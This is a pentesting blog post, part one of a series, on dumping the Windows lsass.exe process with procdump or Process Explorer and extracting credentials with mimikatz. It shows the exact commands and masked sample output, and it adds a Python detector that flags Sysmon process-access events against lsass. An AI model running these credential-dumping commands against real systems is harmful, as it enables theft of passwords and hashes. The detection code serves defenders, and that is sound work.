danielsauder

IT security is a matter of trust.

Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump

Part 1 is simple. Dump the lsass.exe process and use mimikatz to extract the credentials as clear text and as hashes. You need admin or SYSTEM rights for this.
But first, as a short reminder, let's have a look at the "normal" way of dumping credentials from the lsass.exe process with mimikatz:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
— cut —
If you do not have a self-compiled or otherwise obfuscated mimikatz build, every antivirus scanner will do its work. But it is also possible to read the credentials from a memory dump of the process instead.
Make a memory dump with Process Explorer (right-click lsass.exe, Create Dump) and remember to create a full dump, not a minidump.
Or use procdump:
procdump -accepteula -ma lsass.exe lsass.dmp
which is much more convenient for pentesters who only have shell access.
For dumping the credentials in clear text use mimikatz:
mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : 'e:\lsass.dmp'
mimikatz # sekurlsa::logonPasswords
Opening : 'e:\lsass.dmp' file for minidump...
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
Domain            : DAX-RYMZ48Z3EYO
Logon Server      : DAX-RYMZ48Z3EYO
Logon Time        : 23.01.2016 14:42:11
SID               : S-1-5-21-436374069-688789844-839522115-1003
        msv :
         [00000002] Primary
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * LM       : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * NTLM     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * SHA1     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        wdigest :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
        kerberos :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
— cut —
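From the defender's side, both dump methods above have one thing in common: they open a handle to lsass.exe with at least PROCESS_QUERY_INFORMATION and PROCESS_VM_READ, the rights the Windows dump API (MiniDumpWriteDump) requires, and that handle open is what process-access telemetry records. The following is an added example, not code from the original post or from the mimikatz or Sysinternals projects. It parses constructed log lines shaped like Sysmon Event ID 10 (ProcessAccess) records (the field names SourceImage, TargetImage and GrantedAccess are Sysmon's; the paths and access masks in the samples are made up) and flags every process that opened lsass.exe with the rights a dump needs, with an optional allowlist for known-good openers.

```python
"""Flag process-access events against lsass.exe that carry memory-read rights.

Added example, not part of the original post. Input records are constructed
here in the shape of Sysmon Event ID 10 (ProcessAccess) fields; the field
names SourceImage, TargetImage and GrantedAccess match that event, while the
sample paths and access masks are made up for this demonstration.
"""
import re

# Win32 process access rights (see the PROCESS_* access-rights constants).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000  # normal housekeeping access

# MiniDumpWriteDump needs at least QUERY_INFORMATION and VM_READ on the
# target process, so these two bits together are the minimum a dump needs.
DUMP_RIGHTS = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Constructed sample telemetry: one ProcessAccess event per line.
SAMPLE_EVENTS = [
    "SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "SourceImage=C:\\Tools\\procdump.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF",
    "SourceImage=C:\\Tools\\procexp64.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1410",
    "SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "SourceImage=C:\\Windows\\System32\\taskmgr.exe TargetImage=C:\\Windows\\explorer.exe GrantedAccess=0x1FFFFF",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn 'Key=Value Key=Value' into a dict; GrantedAccess becomes an int."""
    fields = dict(FIELD_RE.findall(line))
    fields["GrantedAccess"] = int(fields.get("GrantedAccess", "0"), 16)
    return fields


def is_lsass_dump_access(event, allowlist=()):
    """True if the event opened lsass.exe with the rights a dump requires.

    Sources whose image basename (lower-case) is in ``allowlist`` are skipped,
    so known-good system processes can be tuned out.
    """
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    source = event.get("SourceImage", "").lower().rsplit("\\", 1)[-1]
    if source in allowlist:
        return False
    # All bits of DUMP_RIGHTS must be present; QUERY_LIMITED alone is benign.
    return event["GrantedAccess"] & DUMP_RIGHTS == DUMP_RIGHTS


def find_lsass_dump_attempts(lines, allowlist=()):
    """Return the SourceImage of every event that looks like an lsass dump."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_lsass_dump_access(event, allowlist):
            hits.append(event["SourceImage"])
    return hits


if __name__ == "__main__":
    for source in find_lsass_dump_attempts(SAMPLE_EVENTS):
        print("lsass.exe opened with dump rights by", source)
```

The check is on the access-mask bits, not on a fixed list of mask values, because the mask a dumping tool ends up with varies (the samples show 0x1FFFFF, full access, and 0x1410, query plus read); what does not vary is that the two dump rights are both present. Real deployments tune the allowlist against a baseline of which processes legitimately open lsass.exe on the host.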
Overview:
https://govolution.wordpress.com/2016/02/06/memdumps-volatility-mimikatz-vms-overview/
Links:
https://github.com/gentilkiwi/mimikatz
https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
https://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html

One response to “Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump”

  1. […] have a look at countermeasures in a later part (whereby I mean monitoring and logging). Overview Part 1: Mimikatz & lsass.exe Dump Part 2: Windows 7 Full Memory Dump & Get Hashes Part 3: WinDBG Mimikatz Extension Part […]
